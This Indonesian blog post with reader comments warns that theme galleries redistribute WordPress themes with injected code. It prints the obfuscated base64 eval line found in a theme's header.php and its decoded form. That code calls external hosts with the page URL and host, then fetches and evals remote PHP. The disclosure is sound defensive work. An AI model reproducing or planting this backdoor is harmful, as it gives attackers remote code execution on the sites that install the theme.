Malicious code in redistributed WordPress theme

December 10, 2007 – 8:15 am | Posted in Berita, Theme |

Hati-hati, sekarang ada beberapa web site theme gallery yg mendistribusikan ulang WordPress theme yg sudah ditambahkan kode berbahaya. Kode ini bisa men-tracking pengunjung blog kita atau bahkan menampilkan iklan pada blog kita.

Dari website 5thirtyone, disebutkan paling tidak ada dua theme gallery yg melakukan kecurangan ini, yaitu WPSphere.com dan TemplatesBrowser.com.

Barusan aku coba download theme i-theme dari WPSphere, ini theme dg tampilan seperti Mac yg banyak dipakai oleh teman-teman blogger di Indonesia, dan berikut ini kode berbahaya yg aku temukan pada baris ke 21 file header.php nya:

21

<body><?php @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>

Dengan adanya modus seperti ini, mau ga mau setiap kali kita mendownload theme dari sebuah theme gallery, pastikan tidak ada kode berbahaya seperti diatas, atau kalau ga ngerti, cari saja alamat pembuat aslinya dan download langsung dari situs pembuatnya itu.

Kode dalam format base64 diatas kalau kita ubah ke bentuk yg agak bisa dimengerti akan jadi seperti ini:

1

if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen(”www.wpssr.com”, 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = “wpssr”; elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen(”www.wpsnc.com”, 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = “wpsnc”; else $R50F5F9C80F12FFAE8B2400528E81B34E = “wpsnc2?; @eval($R14AF1BE9EE26A90921E64A82E7836797 = 1;); if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get(’allow_url_fopen’)) { $RD3FE9C10A808A54EA2A3DBD9E605B696 =1?; $R6E4F14B335243BE656C65E3ED9E1B115 = “http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=”. urlencode($_SERVER[’REQUEST_URI’]) .”&”. “host=”. urlencode($_SERVER[’HTTP_HOST’]); $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115); @eval($R3E33E017CD76B9B7E6C7364FB91E2E90); } else { $RD3FE9C10A808A54EA2A3DBD9E605B696 = “0?; $R6E4F14B335243BE656C65E3ED9E1B115 = “http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=”. urlencode($_SERVER[’REQUEST_URI’]) .”&”. “host=”. urlencode($_SERVER[’HTTP_HOST’]); @readfile($R6E4F14B335243BE656C65E3ED9E1B115); } fclose($R37C014DAE5FE4FE5C77B6735ABC30916);

Ehm.. Sangat-sangat mencurigakan!

If you enjoyed this post, please subscribe to my blog RSS feed, and thanks for stopping by :)

AddThis Social Bookmark Button Lintas Berita Button

Related Posts

  1. 12 Responses to “Malicious code in redistributed WordPress theme”

  2. ars » yaa itu namanya ‘korban’ mas :))

    wawans last blog post..24 Mei 2008

    By wawan on May 26, 2008

  3. wah… kalo udah spreading di web lain, gimana tuh..

    By ARS on May 22, 2008

  4. yohang » caranya gampang, ganti aja fungsi eval sama fungsi echo :mrgreen:

    By wawan on Jan 14, 2008

  5. Waduuuh, harus selektif nih. Tapi memang kode-kode itu patut dipertanyakan kok. Buat apa theme ada script kayak gituan. Jelas dah diluar kaedah codec WP. Btw gimana tuh kok bisa meng-encode code-nya?

    By YoHang on Jan 14, 2008

  6. dedy » ehmm… kalo aku sih mbacanya gini mas:

    kirimkan informasi dari alamat URI (REQUEST_URI) serta headernya (HTTP_HOST) sebagai parameter dari GET http://www. wpssr. com/wpsnc.php?url=alamat URI lengkap&host=informasi header.

    By wawan on Dec 18, 2007

  7. Itu untuk proteksi code PHP kan? Soalnya banyak yang mengedit WP themes yang ada sambil menghilangkan credit pembuatnya…

    Deddy’s last blog post..Blogger Indonesia Peduli Global Warming

    By Deddy on Dec 18, 2007

  8. aNdRa » kebetulan aku nemunya di header.php mbak, tapi bisa saja di taro di file yg lain :evil:

    By wawan on Dec 10, 2007

  9. Eh iya toh? Aku jarang merhatiin file header.php , palingan utak-atik sidebar.php ajah… :oops: hehehe maluw… ini themesnya ganti lagi (hurupnya kecil amat yak)… :roll:
    aNdRa™’s last blog post..Hanya Satu Dua Tiga Empat

    By aNdRa™ on Dec 10, 2007

  10. ardy » berhubung aku ga pernah bikin sendiri themenya jd info ini penting dy hehehe…

    jujur ga pernah design template wordpress dari awal, paling banter ngubah open web design template ke wordpress ato blogsome.

    design dari awal cuma buat intranet kantor *dulu…*, coba cms yg dipake wp, pasti aku ga akan bikin dari awal :mrgreen:

    By wawan on Dec 10, 2007

  11. makasih infonya mas Pur

    untungnya saya pake theme sendiri

    *de javu komen gini :) *

    rd Limosin’s last blog post..Jejaring-jejaring sosial

    By rd Limosin on Dec 10, 2007

  12. ku kutip langsung dari helpnya php:

    eval — Evaluate a string as PHP code

    Evaluates the string given in code_str as PHP code. Among other things, this can be useful for storing code in a database text field for later execution.

    Kalimat terenkripsi base64nya diubah jadi string yg berisi kode php, terus di jalanin pake eval, kayaknya sih gitu mas.

    By wawan on Dec 10, 2007

  13. eval? jadi dibikin variabel dong ya? :-?
    Donny Reza’s last blog post..Mitos Sialan

    By Donny Reza on Dec 10, 2007

Post a Comment

WordPress [at] mimpikami . com is proudly powered by WordPress | Entries (RSS) and Comments (RSS)